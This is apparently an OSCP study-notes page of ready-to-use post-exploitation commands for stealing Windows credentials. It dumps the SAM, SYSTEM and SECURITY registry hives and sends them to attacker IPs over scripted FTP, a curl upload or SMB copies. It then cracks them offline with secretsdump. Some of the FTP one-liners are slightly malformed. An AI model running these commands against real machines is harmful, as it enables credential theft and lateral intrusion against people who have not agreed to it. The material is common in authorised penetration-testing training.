> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/post-exploitation/exfiltration.md).

# Exfiltration

Dump the SAM hive to the pwd

```
reg.exe save HKLM\SAM C:\programdata\sam.bak
```

Dump the System hive to the pwd

```
reg.exe save HKLM\SYSTEM C:\programdata\system.bak
```

Dump the Security hive to the pwd

```
reg.exe save HKLM\SECURITY C:\programdata\security.bak
```

Spin up an smb server

```bash
impacket-smbserver share share/ -smb2support
```

```powershell
echo open 10.9.254.6 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
ftp -v -n -s:ftp.txt
```

Exfiltrate data

```
python3 -m uploadserver
```

```
curl -X POST http://HOST/upload -H -F 'files=@file.txt'
```

#### OR

```
python -m pyftpdlib -p 21 --write
```

```
echo open 192.168.45.237 21 > ftp.txt && echo user anonymous >> ftp.txt && echo anonymous >> ftp.txt && echo binary >> ftp.txt && echo put C:\programdata\sam.bak >> ftp.txt && echo put C:\programdata\system.bak >> ftp.txt && echo put C:\programdata\security.bak && echo bye >> ftp.txt
```

```
ftp -v -n -s:ftp.txt
```

#### OR

```
New-SmbMapping -LocalPath A: -RemotePath \\192.168.229.121\share -TcpPort 8888
```

```powerquery
net use "\\192.168.171.121\adot8"
copy sam.bak "\\192.168.171.121\adot8\sam.bak"
copy system.bak "\\192.168.171.121\adot8\system.bak"
copy security.bak "\\192.168.171.121\adot8\security.bak"
```

Dump hashes with secretsdump

```bash
secretsdump.py -sam sam.bak -system system.bak -security security.bak local
```
